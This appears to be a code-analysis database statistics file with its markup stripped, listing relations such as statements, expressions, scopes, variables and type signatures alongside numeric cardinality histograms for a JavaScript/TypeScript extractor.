-1 - - -48 -49 -1 - - -69 -70 -1 - - -104 -105 -1 - - -152 -153 -1 - - -230 -231 -1 - - -348 -349 -1 - - -581 -582 -1 - - -1020 -1021 -1 - - - - - - -param_index -constructor - - -12 - - -1 -2 -1 - - -2 -3 -1 - - -3 -4 -1 - - -4 -5 -1 - - -5 -6 -1 - - -6 -7 -1 - - -8 -9 -1 - - -10 -11 -1 - - -15 -16 -1 - - -22 -23 -1 - - -29 -30 -1 - - -36 -37 -1 - - -48 -49 -1 - - -69 -70 -1 - - -104 -105 -1 - - -152 -153 -1 - - -230 -231 -1 - - -348 -349 -1 - - -581 -582 -1 - - -1020 -1021 -1 - - - - - - - - -is_const_enum -62 - - -id -62 - - - - - -is_abstract_class -116 - - -id -116 - - - - - -typeexprs -54050 - - -id -54050 - - -kind -6 - - -parent -29264 - - -idx -26 - - -tostring -3278 - - - - -id -kind - - -12 - - -1 -2 -54050 - - - - - - -id -parent - - -12 - - -1 -2 -54050 - - - - - - -id -idx - - -12 - - -1 -2 -54050 - - - - - - -id -tostring - - -12 - - -1 -2 -54050 - - - - - - -kind -id - - -12 - - -3 -4 -1 - - -4 -5 -1 - - -733 -734 -1 - - -2513 -2514 -1 - - -25306 -25307 -1 - - -25491 -25492 -1 - - - - - - -kind -parent - - -12 - - -3 -4 
-1 - - -4 -5 -1 - - -733 -734 -1 - - -2513 -2514 -1 - - -16661 -16662 -1 - - -17601 -17602 -1 - - - - - - -kind -idx - - -12 - - -1 -2 -2 - - -3 -4 -1 - - -4 -5 -1 - - -19 -20 -1 - - -25 -26 -1 - - - - - - -kind -tostring - - -12 - - -2 -3 -1 - - -3 -4 -1 - - -9 -10 -1 - - -242 -243 -1 - - -2075 -2076 -1 - - -2322 -2323 -1 - - - - - - -parent -id - - -12 - - -1 -2 -15321 - - -2 -3 -7887 - - -3 -4 -3725 - - -4 -9 -2229 - - -9 -24 -102 - - - - - - -parent -kind - - -12 - - -1 -2 -21285 - - -2 -3 -7707 - - -3 -4 -272 - - - - - - -parent -idx - - -12 - - -1 -2 -15321 - - -2 -3 -7887 - - -3 -4 -3725 - - -4 -9 -2229 - - -9 -24 -102 - - - - - - -parent -tostring - - -12 - - -1 -2 -16315 - - -2 -3 -8432 - - -3 -4 -3126 - - -4 -22 -1391 - - - - - - -idx -id - - -12 - - -1 -2 -2 - - -3 -4 -2 - - -4 -7 -2 - - -10 -12 -2 - - -13 -22 -2 - - -27 -38 -2 - - -54 -61 -2 - - -101 -212 -2 - - -356 -530 -2 - - -859 -1645 -2 - - -2513 -2519 -2 - - -3330 -7198 -2 - - -15305 -19237 -2 - - - - - - -idx -kind - - -12 - - -1 -2 -7 - - -2 -3 -14 - - -3 -4 -2 - - -4 -5 -3 - - - - - - -idx -parent - - -12 - - -1 -2 -2 - - -3 -4 -2 - - -4 -7 -2 - - -10 -12 -2 - - -13 -22 -2 - - -27 -38 -2 - - -54 -61 -2 - - -101 -212 -2 - - -356 -530 -2 - - -859 -1645 -2 - - -2513 -2519 -2 - - -3330 -7198 -2 - - -15305 -19237 -2 - - - - - - -idx -tostring - - -12 - - -1 -2 -2 - - -3 -4 -2 - - -4 -6 -2 - - -9 -10 -2 - - -12 -17 -2 - - -18 -26 -2 - - -28 -31 -2 - - -37 -44 -2 - - -60 -71 -2 - - -108 -196 -2 - - -395 -667 -2 - - -746 -978 -2 - - -1522 -2076 -2 - - - - - - -tostring -id - - -12 - - -1 -2 -1085 - - -2 -3 -627 - - -3 -4 -344 - - -4 -5 -322 - - -5 -7 -292 - - -7 -12 -260 - - -12 -45 -247 - - -45 -7788 -101 - - - - - - -tostring -kind - - -12 - - -1 -2 -1903 - - -2 -3 -1375 - - - - - - -tostring -parent - - -12 - - -1 -2 -1097 - - -2 -3 -631 - - -3 -4 -341 - - -4 -5 -327 - - -5 -7 -292 - - -7 -12 -253 - - -12 -48 -246 - - -48 -6190 -91 - - - - - - -tostring -idx - - -12 - - -1 -2 -1450 - - -2 -3 -939 - 
- -3 -4 -481 - - -4 -6 -289 - - -6 -19 -119 - - - - - - - - -is_for_await_of -1 - - -forof -1 - - - - - -is_module -21 - - -tl -21 - - - - - -is_es2015_module -21 - - -tl -21 - - - - - -is_closure_module -21 - - -tl -21 - - - - - -toplevel_parent_xml_node -43 - - -toplevel -43 - - -xmlnode -43 - - - - -toplevel -xmlnode - - -12 - - -1 -2 -43 - - - - - - -xmlnode -toplevel - - -12 - - -1 -2 -43 - - - - - - - - -xml_element_parent_expression -1 - - -xmlnode -1 - - -expression -1 - - -index -1 - - - - -xmlnode -expression - - -12 - - -1 -2 -1 - - - - - - -xmlnode -index - - -12 - - -1 -2 -1 - - - - - - -expression -xmlnode - - -12 - - -1 -2 -1 - - - - - - -expression -index - - -12 - - -1 -2 -1 - - - - - - -index -xmlnode - - -12 - - -1 -2 -1 - - - - - - -index -expression - - -12 - - -1 -2 -1 - - - - - - - - -is_nodejs -12 - - -tl -12 - - - - - -stmts -id -1096691 - - -id -1096691 - - -kind -31 - - -parent -412140 - - -idx -152947 - - -tostring -284956 - - - - -id -kind - - -12 - - -1 -2 -1096691 - - - - - - -id -parent - - -12 - - -1 -2 -1096691 - - - - - - -id -idx - - -12 - - -1 -2 -1096691 - - - - - - -id -tostring - - -12 - - -1 -2 -1096691 - - - - - - -kind -id - - -12 - - -1 -2 -3 - - -3 -5 -2 - - -5 -9 -2 - - -31 -42 -2 - - -61 -552 -2 - - -1118 -1137 -2 - - -1272 -1316 -2 - - -1316 -1379 -2 - - -1471 -1570 -2 - - -1642 -2306 -2 - - -3120 -5386 -2 - - -8674 -10150 -2 - - -16771 -48210 -2 - - -68214 -105607 -2 - - -204994 -610341 -2 - - - - - - -kind -parent - - -12 - - -1 -2 -4 - - -3 -5 -2 - - -5 -6 -2 - - -35 -59 -2 - - -298 -424 -2 - - -738 -1157 -2 - - -1253 -1263 -2 - - -1271 -1321 -2 - - -1495 -1568 -2 - - -1642 -2306 -2 - - -2999 -4416 -2 - - -4734 -10123 -2 - - -48139 -48347 -2 - - -50857 -162082 -2 - - -191077 -191078 -1 - - - - - - -kind -idx - - -12 - - -1 -2 -3 - - -2 -3 -2 - - -3 -4 -2 - - -8 -9 -2 - - -10 -12 -2 - - -16 -22 -2 - - -28 -32 -2 - - -36 -37 -2 - - -39 -51 -2 - - -54 -63 -2 - - -65 -67 -2 - - -116 -118 -2 - - -122 -138 -2 - - -251 
-1564 -2 - - -1967 -152946 -2 - - - - - - -kind -tostring - - -12 - - -1 -2 -5 - - -2 -3 -2 - - -4 -11 -2 - - -12 -17 -2 - - -88 -104 -2 - - -147 -168 -2 - - -239 -296 -2 - - -356 -428 -2 - - -591 -705 -2 - - -811 -829 -2 - - -1092 -2254 -2 - - -2665 -10292 -2 - - -18023 -21916 -2 - - -43911 -180066 -2 - - - - - - -parent -id - - -12 - - -1 -2 -265890 - - -2 -3 -69435 - - -3 -4 -25109 - - -4 -8 -34966 - - -8 -152946 -16740 - - - - - - -parent -kind - - -12 - - -1 -2 -319546 - - -2 -3 -67918 - - -3 -23 -24676 - - - - - - -parent -idx - - -12 - - -1 -2 -265890 - - -2 -3 -69435 - - -3 -4 -25109 - - -4 -8 -34966 - - -8 -152946 -16740 - - - - - - -parent -tostring - - -12 - - -1 -2 -275359 - - -2 -3 -62818 - - -3 -4 -25781 - - -4 -8 -34293 - - -8 -19511 -13889 - - - - - - -idx -id - - -12 - - -1 -2 -149939 - - -2 -220361 -3008 - - - - - - -idx -kind - - -12 - - -1 -2 -149940 - - -2 -28 -3007 - - - - - - -idx -parent - - -12 - - -1 -2 -149939 - - -2 -220361 -3008 - - - - - - -idx -tostring - - -12 - - -1 -2 -149939 - - -2 -88922 -3008 - - - - - - -tostring -id - - -12 - - -1 -2 -186537 - - -2 -3 -48494 - - -3 -5 -24651 - - -5 -37 -21526 - - -37 -72175 -3748 - - - - - - -tostring -kind - - -12 - - -1 -2 -284895 - - -2 -4 -61 - - - - - - -tostring -parent - - -12 - - -1 -2 -195596 - - -2 -3 -45562 - - -3 -5 -23127 - - -5 -66340 -20671 - - - - - - -tostring -idx - - -12 - - -1 -2 -225945 - - -2 -3 -33948 - - -3 -13 -21496 - - -13 -903 -3567 - - - - - - - - -stmt_containers -1096691 - - -stmt -1096691 - - -container -120740 - - - - -stmt -container - - -12 - - -1 -2 -1096691 - - - - - - -container -stmt - - -12 - - -1 -2 -6778 - - -2 -3 -35010 - - -3 -4 -16178 - - -4 -5 -12184 - - -5 -6 -9476 - - -6 -7 -7569 - - -7 -9 -10084 - - -9 -13 -10057 - - -13 -27 -9196 - - -27 -152947 -4208 - - - - - - - - -jump_targets -11791 - - -jump -11791 - - -target -4873 - - - - -jump -target - - -12 - - -1 -2 -11791 - - - - - - -target -jump - - -12 - - -1 -2 -2542 - - -2 -3 -1106 - - -3 -4 
-505 - - -4 -6 -410 - - -6 -260 -310 - - - - - - - - -exprs -id -5495305 - - -id -5495305 - - -kind -85 - - -parent -3130204 - - -idx -17698 - - -tostring -834491 - - - - -id -kind - - -12 - - -1 -2 -5495305 - - - - - - -id -parent - - -12 - - -1 -2 -5495305 - - - - - - -id -idx - - -12 - - -1 -2 -5495305 - - - - - - -id -tostring - - -12 - - -1 -2 -5495305 - - - - - - -kind -id - - -12 - - -1 -4 -7 - - -4 -45 -7 - - -50 -97 -7 - - -108 -458 -7 - - -503 -824 -7 - - -1135 -2497 -7 - - -2527 -5439 -7 - - -5655 -10255 -7 - - -10789 -15893 -7 - - -17758 -42854 -7 - - -50958 -130844 -7 - - -245084 -722374 -7 - - -1295408 -1295409 -1 - - - - - - -kind -parent - - -12 - - -1 -3 -7 - - -3 -45 -7 - - -47 -93 -7 - - -106 -407 -7 - - -457 -809 -7 - - -1108 -2420 -7 - - -2502 -5349 -7 - - -5453 -10133 -7 - - -10658 -15697 -7 - - -16273 -36888 -7 - - -41849 -128642 -7 - - -199566 -722374 -7 - - -1171898 -1171899 -1 - - - - - - -kind -idx - - -12 - - -1 -2 -7 - - -2 -3 -12 - - -3 -4 -11 - - -4 -5 -7 - - -5 -6 -7 - - -6 -7 -3 - - -7 -8 -7 - - -8 -11 -6 - - -12 -18 -7 - - -20 -64 -7 - - -82 -395 -7 - - -431 -13375 -4 - - - - - - -kind -tostring - - -12 - - -1 -2 -7 - - -2 -6 -7 - - -8 -37 -7 - - -38 -126 -7 - - -142 -304 -7 - - -358 -721 -7 - - -811 -1485 -7 - - -1523 -2918 -7 - - -3305 -5078 -7 - - -5422 -9940 -7 - - -10536 -40606 -7 - - -46227 -123090 -7 - - -128754 -128755 -1 - - - - - - -parent -id - - -12 - - -1 -2 -1100280 - - -2 -3 -1876078 - - -3 -17692 -153846 - - - - - - -parent -kind - - -12 - - -1 -2 -1300246 - - -2 -3 -1747609 - - -3 -8 -82349 - - - - - - -parent -idx - - -12 - - -1 -2 -1100280 - - -2 -3 -1876078 - - -3 -17692 -153846 - - - - - - -parent -tostring - - -12 - - -1 -2 -1108803 - - -2 -3 -1870864 - - -3 -17526 -150537 - - - - - - -idx -id - - -12 - - -1 -2 -4092 - - -2 -3 -1365 - - -3 -4 -1995 - - -4 -5 -283 - - -5 -6 -1681 - - -6 -7 -5909 - - -7 -10 -1344 - - -10 -3049605 -1029 - - - - - - -idx -kind - - -12 - - -1 -2 -10648 - - -2 -3 -6398 - - -3 -83 
-652 - - - - - - -idx -parent - - -12 - - -1 -2 -4092 - - -2 -3 -1365 - - -3 -4 -1995 - - -4 -5 -283 - - -5 -6 -1681 - - -6 -7 -5909 - - -7 -10 -1344 - - -10 -3049605 -1029 - - - - - - -idx -tostring - - -12 - - -1 -2 -4093 - - -2 -3 -1365 - - -3 -4 -2014 - - -4 -5 -1147 - - -5 -6 -1529 - - -6 -7 -5401 - - -7 -10 -1499 - - -10 -573348 -650 - - - - - - -tostring -id - - -12 - - -1 -2 -466570 - - -2 -3 -157949 - - -3 -4 -55443 - - -4 -6 -61411 - - -6 -17 -63412 - - -17 -128652 -29706 - - - - - - -tostring -kind - - -12 - - -1 -2 -772624 - - -2 -24 -61867 - - - - - - -tostring -parent - - -12 - - -1 -2 -467110 - - -2 -3 -158201 - - -3 -4 -55446 - - -4 -6 -61061 - - -6 -17 -63168 - - -17 -128642 -29505 - - - - - - -tostring -idx - - -12 - - -1 -2 -724438 - - -2 -3 -86524 - - -3 -7765 -23529 - - - - - - - - -literals -expr -3145090 - - -value -216517 - - -raw -234110 - - -expr -3145090 - - - - -value -raw - - -12 - - -1 -2 -201221 - - -2 -25 -15296 - - - - - - -value -expr - - -12 - - -1 -2 -95821 - - -2 -3 -41222 - - -3 -4 -19627 - - -4 -5 -16097 - - -5 -9 -18825 - - -9 -31 -16474 - - -31 -122435 -8451 - - - - - - -raw -value - - -12 - - -1 -2 -234110 - - - - - - -raw -expr - - -12 - - -1 -2 -104635 - - -2 -3 -47230 - - -3 -4 -20082 - - -4 -5 -16835 - - -5 -9 -19610 - - -9 -34 -17695 - - -34 -120241 -8023 - - - - - - -expr -value - - -12 - - -1 -2 -3145090 - - - - - - -expr -raw - - -12 - - -1 -2 -3145090 - - - - - - - - -enclosing_stmt -5372899 - - -expr -5372899 - - -stmt -854574 - - - - -expr -stmt - - -12 - - -1 -2 -5372899 - - - - - - -stmt -expr - - -12 - - -1 -3 -74578 - - -3 -4 -254844 - - -4 -5 -57228 - - -5 -6 -136234 - - -6 -7 -44557 - - -7 -8 -79401 - - -8 -9 -55420 - - -9 -11 -63155 - - -11 -17 -65146 - - -17 -88321 -24011 - - - - - - - - -expr_containers -5495305 - - -expr -5495305 - - -container -118511 - - - - -expr -container - - -12 - - -1 -2 -5495305 - - - - - - -container -expr - - -12 - - -1 -4 -7197 - - -4 -6 -9110 - - -6 -8 -9222 - - -8 -10 -8424 
- - -10 -13 -10651 - - -13 -16 -8706 - - -16 -20 -9358 - - -20 -25 -9955 - - -25 -31 -8893 - - -31 -40 -9356 - - -40 -54 -9017 - - -54 -85 -8935 - - -85 -484 -8890 - - -484 -459128 -797 - - - - - - - - -array_size -28188 - - -ae -28188 - - -sz -118 - - - - -ae -sz - - -12 - - -1 -2 -28188 - - - - - - -sz -ae - - -12 - - -1 -2 -52 - - -2 -3 -21 - - -3 -5 -9 - - -5 -8 -9 - - -9 -20 -9 - - -22 -181 -9 - - -231 -12345 -9 - - - - - - - - -is_delegating -4 - - -yield -4 - - - - - -expr_contains_template_tag_location -31 - - -expr -31 - - -location -31 - - - - -expr -location - - -12 - - -1 -2 -31 - - - - - - -location -expr - - -12 - - -1 -2 -31 - - - - - - - - -template_placeholder_tag_info -283 - - -node -283 - - -parentNode -92 - - -raw -24 - - - - -node -parentNode - - -12 - - -1 -2 -283 - - - - - - -node -raw - - -12 - - -1 -2 -283 - - - - - - -parentNode -node - - -12 - - -1 -2 -49 - - -2 -3 -4 - - -3 -4 -9 - - -5 -6 -9 - - -6 -7 -4 - - -7 -8 -13 - - -9 -11 -4 - - - - - - -parentNode -raw - - -12 - - -1 -2 -49 - - -2 -3 -4 - - -3 -4 -9 - - -4 -5 -11 - - -5 -6 -13 - - -6 -11 -6 - - - - - - -raw -node - - -12 - - -1 -2 -2 - - -2 -3 -4 - - -3 -4 -9 - - -4 -6 -2 - - -16 -17 -2 - - -20 -26 -2 - - -34 -45 -2 - - -82 -83 -1 - - - - - - -raw -parentNode - - -12 - - -1 -2 -2 - - -2 -3 -4 - - -3 -4 -9 - - -4 -6 -2 - - -16 -17 -2 - - -20 -26 -2 - - -34 -41 -2 - - -44 -45 -1 - - - - - - - - -scopes -id -118172 - - -id -118172 - - -kind -8 - - - - -id -kind - - -12 - - -1 -2 -118172 - - - - - - -kind -id - - -12 - - -1 -2 -1 - - -4 -5 -1 - - -17 -18 -1 - - -21 -22 -1 - - -28 -29 -1 - - -584 -585 -1 - - -1272 -1273 -1 - - -116245 -116246 -1 - - - - - - - - -scopenodes -118171 - - -node -118171 - - -scope -118171 - - - - -node -scope - - -12 - - -1 -2 -118171 - - - - - - -scope -node - - -12 - - -1 -2 -118171 - - - - - - - - -scopenesting -118171 - - -inner -118171 - - -outer -33143 - - - - -inner -outer - - -12 - - -1 -2 -118171 - - - - - - -outer -inner - - -12 - - -1 -2 -17868 
- - -2 -3 -6196 - - -3 -4 -2666 - - -4 -6 -2791 - - -6 -13 -2584 - - -13 -17277 -1038 - - - - - - - - -is_generator -62 - - -fun -62 - - - - - -has_rest_parameter -33 - - -fun -33 - - - - - -is_async -50 - - -fun -50 - - - - - -variables -id -364388 - - -id -364388 - - -name -56559 - - -scope -118168 - - - - -id -name - - -12 - - -1 -2 -364388 - - - - - - -id -scope - - -12 - - -1 -2 -364388 - - - - - - -name -id - - -12 - - -1 -2 -38013 - - -2 -3 -9547 - - -3 -5 -4518 - - -5 -115 -4242 - - -115 -116259 -239 - - - - - - -name -scope - - -12 - - -1 -2 -38013 - - -2 -3 -9547 - - -3 -5 -4518 - - -5 -115 -4242 - - -115 -116259 -239 - - - - - - -scope -id - - -12 - - -1 -2 -39907 - - -2 -3 -32053 - - -3 -4 -18882 - - -4 -5 -9814 - - -5 -8 -10909 - - -8 -8779 -6603 - - - - - - -scope -name - - -12 - - -1 -2 -39907 - - -2 -3 -32053 - - -3 -4 -18882 - - -4 -5 -9814 - - -5 -8 -10909 - - -8 -8779 -6603 - - - - - - - - -local_type_names -23565 - - -id -23565 - - -name -6080 - - -scope -1614 - - - - -id -name - - -12 - - -1 -2 -23565 - - - - - - -id -scope - - -12 - - -1 -2 -23565 - - - - - - -name -id - - -12 - - -1 -2 -2821 - - -2 -3 -1362 - - -3 -4 -641 - - -4 -6 -508 - - -6 -13 -485 - - -13 -533 -263 - - - - - - -name -scope - - -12 - - -1 -2 -2821 - - -2 -3 -1362 - - -3 -4 -641 - - -4 -6 -508 - - -6 -13 -485 - - -13 -533 -263 - - - - - - -scope -id - - -12 - - -1 -2 -138 - - -2 -3 -109 - - -3 -4 -116 - - -4 -5 -108 - - -5 -7 -140 - - -7 -8 -89 - - -8 -10 -131 - - -10 -12 -112 - - -12 -15 -144 - - -15 -19 -134 - - -19 -25 -132 - - -25 -37 -122 - - -37 -87 -122 - - -87 -221 -17 - - - - - - -scope -name - - -12 - - -1 -2 -138 - - -2 -3 -109 - - -3 -4 -116 - - -4 -5 -108 - - -5 -7 -140 - - -7 -8 -89 - - -8 -10 -131 - - -10 -12 -112 - - -12 -15 -144 - - -15 -19 -134 - - -19 -25 -132 - - -25 -37 -122 - - -37 -87 -122 - - -87 -221 -17 - - - - - - - - -local_namespace_names -20832 - - -id -20832 - - -name -4078 - - -scope -1543 - - - - -id -name - - -12 - - -1 -2 -20832 - - - - - 
- -id -scope - - -12 - - -1 -2 -20832 - - - - - - -name -id - - -12 - - -1 -2 -1787 - - -2 -3 -859 - - -3 -4 -378 - - -4 -5 -216 - - -5 -8 -364 - - -8 -20 -310 - - -20 -533 -164 - - - - - - -name -scope - - -12 - - -1 -2 -1787 - - -2 -3 -859 - - -3 -4 -378 - - -4 -5 -216 - - -5 -8 -364 - - -8 -20 -310 - - -20 -533 -164 - - - - - - -scope -id - - -12 - - -1 -2 -88 - - -2 -3 -123 - - -3 -4 -120 - - -4 -5 -104 - - -5 -6 -107 - - -6 -7 -70 - - -7 -8 -87 - - -8 -10 -137 - - -10 -12 -122 - - -12 -15 -122 - - -15 -19 -124 - - -19 -26 -120 - - -26 -39 -117 - - -39 -136 -102 - - - - - - -scope -name - - -12 - - -1 -2 -88 - - -2 -3 -123 - - -3 -4 -120 - - -4 -5 -104 - - -5 -6 -107 - - -6 -7 -70 - - -7 -8 -87 - - -8 -10 -137 - - -10 -12 -122 - - -12 -15 -122 - - -15 -19 -124 - - -19 -26 -120 - - -26 -39 -117 - - -39 -136 -102 - - - - - - - - -is_arguments_object -116243 - - -id -116243 - - - - - -bind -1295408 - - -id -1295408 - - -decl -224900 - - - - -id -decl - - -12 - - -1 -2 -1295408 - - - - - - -decl -id - - -12 - - -1 -2 -81789 - - -2 -3 -50824 - - -3 -4 -29919 - - -4 -5 -17755 - - -5 -7 -16901 - - -7 -14 -17790 - - -14 -98305 -9922 - - - - - - - - -decl -250257 - - -id -250257 - - -decl -246998 - - - - -id -decl - - -12 - - -1 -2 -250257 - - - - - - -decl -id - - -12 - - -1 -2 -245772 - - -2 -283 -1226 - - - - - - - - -typebind -36216 - - -id -36216 - - -decl -12650 - - - - -id -decl - - -12 - - -1 -2 -36216 - - - - - - -decl -id - - -12 - - -1 -2 -6781 - - -2 -3 -2435 - - -3 -4 -1133 - - -4 -6 -1127 - - -6 -17 -954 - - -17 -524 -220 - - - - - - - - -typedecl -23573 - - -id -23573 - - -decl -23565 - - - - -id -decl - - -12 - - -1 -2 -23573 - - - - - - -decl -id - - -12 - - -1 -2 -23558 - - -2 -4 -7 - - - - - - - - -namespacedecl -20839 - - -id -20839 - - -decl -20832 - - - - -id -decl - - -12 - - -1 -2 -20839 - - - - - - -decl -id - - -12 - - -1 -2 -20828 - - -2 -5 -4 - - - - - - - - -namespacebind -4300 - - -id -4300 - - -decl -485 - - - - -id -decl - - -12 - - -1 -2 
-4300 - - - - - - -decl -id - - -12 - - -1 -2 -133 - - -2 -3 -46 - - -3 -4 -56 - - -4 -5 -30 - - -5 -7 -37 - - -7 -9 -44 - - -9 -12 -41 - - -12 -17 -38 - - -17 -31 -37 - - -32 -287 -23 - - - - - - - - -properties -id -142723 - - -id -142723 - - -parent -45129 - - -index -4204 - - -kind -3 - - -tostring -67703 - - - - -id -parent - - -12 - - -1 -2 -142723 - - - - - - -id -index - - -12 - - -1 -2 -142723 - - - - - - -id -kind - - -12 - - -1 -2 -142723 - - - - - - -id -tostring - - -12 - - -1 -2 -142723 - - - - - - -parent -id - - -12 - - -1 -2 -15702 - - -2 -3 -17715 - - -3 -4 -4729 - - -4 -6 -3778 - - -6 -4205 -3205 - - - - - - -parent -index - - -12 - - -1 -2 -15702 - - -2 -3 -17715 - - -3 -4 -4729 - - -4 -6 -3778 - - -6 -4205 -3205 - - - - - - -parent -kind - - -12 - - -1 -2 -44603 - - -2 -4 -526 - - - - - - -parent -tostring - - -12 - - -1 -2 -15770 - - -2 -3 -17763 - - -3 -4 -4692 - - -4 -6 -3759 - - -6 -4173 -3145 - - - - - - -index -id - - -12 - - -2 -3 -2827 - - -3 -4 -364 - - -4 -6 -358 - - -6 -8 -337 - - -8 -11713 -316 - - -29427 -45130 -2 - - - - - - -index -parent - - -12 - - -2 -3 -2827 - - -3 -4 -364 - - -4 -6 -358 - - -6 -8 -337 - - -8 -11713 -316 - - -29427 -45130 -2 - - - - - - -index -kind - - -12 - - -1 -2 -4149 - - -2 -4 -55 - - - - - - -index -tostring - - -12 - - -1 -2 -2827 - - -2 -3 -364 - - -3 -5 -358 - - -5 -7 -337 - - -7 -6233 -316 - - -16744 -16747 -2 - - - - - - -kind -id - - -12 - - -338 -339 -1 - - -1529 -1530 -1 - - -140856 -140857 -1 - - - - - - -kind -parent - - -12 - - -204 -205 -1 - - -523 -524 -1 - - -45034 -45035 -1 - - - - - - -kind -index - - -12 - - -36 -37 -1 - - -55 -56 -1 - - -4204 -4205 -1 - - - - - - -kind -tostring - - -12 - - -174 -175 -1 - - -880 -881 -1 - - -66649 -66650 -1 - - - - - - -tostring -id - - -12 - - -1 -2 -46301 - - -2 -3 -13295 - - -3 -6 -5112 - - -6 -2975 -2995 - - - - - - -tostring -parent - - -12 - - -1 -2 -46926 - - -2 -3 -13013 - - -3 -7 -5466 - - -7 -2975 -2298 - - - - - - -tostring -index - - -12 - 
- -1 -2 -61480 - - -2 -4 -5275 - - -4 -43 -948 - - - - - - -tostring -kind - - -12 - - -1 -2 -67703 - - - - - - - - -is_computed -27 - - -id -27 - - - - - -is_method -392 - - -id -392 - - - - - -is_static -36 - - -id -36 - - - - - -type_alias -1386 - - -aliasType -1386 - - -underlyingType -1361 - - - - -underlyingType -aliasType - - -12 - - -1 -2 -1 - - - - - - -aliasType -underlyingType - - -12 - - -1 -2 -1 - - - - - - - - -type_literal_value -31882 - - -typ -31882 - - -value -31828 - - - - -typ -value - - -12 - - -1 -2 -31882 - - - - - - -value -typ - - -12 - - -1 -2 -31774 - - -2 -3 -54 - - - - - - - - -signature_types -46921 - - -id -46921 - - -kind -2 - - -tostring -27460 - - -type_parameters -11 - - -required_params -22 - - - - -id -kind - - -12 - - -1 -2 -46921 - - - - - - -id -tostring - - -12 - - -1 -2 -46921 - - - - - - -id -type_parameters - - -12 - - -1 -2 -46921 - - - - - - -id -required_params - - -12 - - -1 -2 -46921 - - - - - - -kind -id - - -12 - - -2639 -2640 -1 - - -44282 -44283 -1 - - - - - - -kind -tostring - - -12 - - -2200 -2201 -1 - - -25260 -25261 -1 - - - - - - -kind -type_parameters - - -12 - - -4 -5 -1 - - -11 -12 -1 - - - - - - -kind -required_params - - -12 - - -18 -19 -1 - - -19 -20 -1 - - - - - - -tostring -id - - -12 - - -1 -2 -22069 - - -2 -3 -3061 - - -3 -13 -2112 - - -13 -277 -218 - - - - - - -tostring -kind - - -12 - - -1 -2 -27460 - - - - - - -tostring -type_parameters - - -12 - - -1 -2 -27459 - - -2 -3 -1 - - - - - - -tostring -required_params - - -12 - - -1 -2 -27134 - - -2 -10 -326 - - - - - - -type_parameters -id - - -12 - - -1 -2 -1 - - -13 -14 -1 - - -25 -26 -1 - - -34 -35 -1 - - -42 -43 -1 - - -51 -52 -1 - - -74 -75 -1 - - -139 -140 -1 - - -274 -275 -1 - - -5367 -5368 -1 - - -40901 -40902 -1 - - - - - - -type_parameters -kind - - -12 - - -1 -2 -7 - - -2 -3 -4 - - - - - - -type_parameters -tostring - - -12 - - -1 -2 -1 - - -5 -6 -1 - - -6 -7 -2 - - -8 -9 -2 - - -17 -18 -1 - - -18 -19 -1 - - -158 -159 -1 - - -1805 -1806 -1 
- - -25429 -25430 -1 - - - - - - -type_parameters -required_params - - -12 - - -1 -2 -1 - - -3 -4 -1 - - -4 -5 -1 - - -5 -6 -1 - - -6 -7 -2 - - -7 -8 -1 - - -8 -9 -2 - - -9 -10 -1 - - -22 -23 -1 - - - - - - -required_params -id - - -12 - - -1 -2 -4 - - -2 -3 -2 - - -3 -5 -2 - - -5 -11 -2 - - -11 -12 -2 - - -44 -131 -2 - - -197 -373 -2 - - -645 -2439 -2 - - -2783 -6853 -2 - - -16407 -17002 -2 - - - - - - -required_params -kind - - -12 - - -1 -2 -7 - - -2 -3 -15 - - - - - - -required_params -tostring - - -12 - - -1 -2 -4 - - -2 -3 -3 - - -4 -5 -1 - - -5 -6 -2 - - -9 -12 -2 - - -39 -62 -2 - - -112 -205 -2 - - -432 -1404 -2 - - -1813 -3662 -2 - - -8431 -11659 -2 - - - - - - -required_params -type_parameters - - -12 - - -1 -2 -12 - - -2 -3 -1 - - -3 -4 -2 - - -5 -7 -2 - - -8 -10 -2 - - -10 -11 -2 - - -11 -12 -1 - - - - - - - - -is_abstract_signature -12 - - -sig -12 - - - - - -signature_rest_parameter -19521 - - -sig -19521 - - -rest_param_arra_type -14259 - - - - -rest_param_arra_type -sig - - -12 - - -1 -2 -1 - - - - - - -sig -rest_param_arra_type - - -12 - - -1 -2 -1 - - - - - - - - -type_contains_signature -87640 - - -typ -68964 - - -kind -2 - - -index -247 - - -sig -37344 - - - - -typ -kind - - -12 - - -1 -2 -68938 - - -2 -3 -26 - - - - - - -typ -index - - -12 - - -1 -2 -59150 - - -2 -3 -5394 - - -3 -248 -4420 - - - - - - -typ -sig - - -12 - - -1 -2 -60034 - - -2 -3 -4557 - - -3 -248 -4373 - - - - - - -kind -typ - - -12 - - -2582 -2583 -1 - - -66408 -66409 -1 - - - - - - -kind -index - - -12 - - -6 -7 -1 - - -247 -248 -1 - - - - - - -kind -sig - - -12 - - -2646 -2647 -1 - - -34698 -34699 -1 - - - - - - -index -typ - - -12 - - -1 -2 -198 - - -2 -3 -21 - - -3 -265 -19 - - -449 -42171 -9 - - - - - - -index -kind - - -12 - - -1 -2 -241 - - -2 -3 -6 - - - - - - -index -sig - - -12 - - -1 -2 -198 - - -2 -3 -24 - - -3 -90 -19 - - -309 -31688 -6 - - - - - - -sig -typ - - -12 - - -1 -2 -35114 - - -2 -896 -2230 - - - - - - -sig -kind - - -12 - - -1 -2 -37344 - - - - - - -sig 
-index - - -12 - - -1 -2 -36489 - - -2 -9 -855 - - - - - - - - -signature_contains_type -107012 - - -child -26824 - - -parent -37344 - - -index -21 - - - - -child -parent - - -12 - - -1 -2 -19848 - - -2 -3 -3736 - - -3 -7 -2017 - - -7 -10275 -1223 - - - - - - -child -index - - -12 - - -1 -2 -22572 - - -2 -3 -3289 - - -3 -22 -963 - - - - - - -parent -child - - -12 - - -1 -2 -3594 - - -2 -3 -18463 - - -3 -4 -10057 - - -4 -5 -3906 - - -5 -11 -1324 - - - - - - -parent -index - - -12 - - -1 -2 -2649 - - -2 -3 -14810 - - -3 -4 -12007 - - -4 -5 -4294 - - -5 -8 -3055 - - -8 -22 -529 - - - - - - -index -child - - -12 - - -1 -2 -2 - - -2 -3 -6 - - -3 -4 -1 - - -5 -6 -1 - - -9 -10 -1 - - -18 -19 -1 - - -106 -107 -1 - - -313 -314 -1 - - -455 -456 -1 - - -643 -644 -1 - - -1088 -1089 -1 - - -2051 -2052 -1 - - -6862 -6863 -1 - - -8789 -8790 -1 - - -12289 -12290 -1 - - - - - - -index -parent - - -12 - - -2 -3 -1 - - -3 -4 -1 - - -4 -5 -2 - - -5 -6 -1 - - -6 -7 -1 - - -17 -18 -1 - - -22 -23 -1 - - -26 -27 -1 - - -37 -38 -1 - - -45 -46 -1 - - -91 -92 -1 - - -219 -220 -1 - - -529 -530 -1 - - -1042 -1043 -1 - - -1574 -1575 -1 - 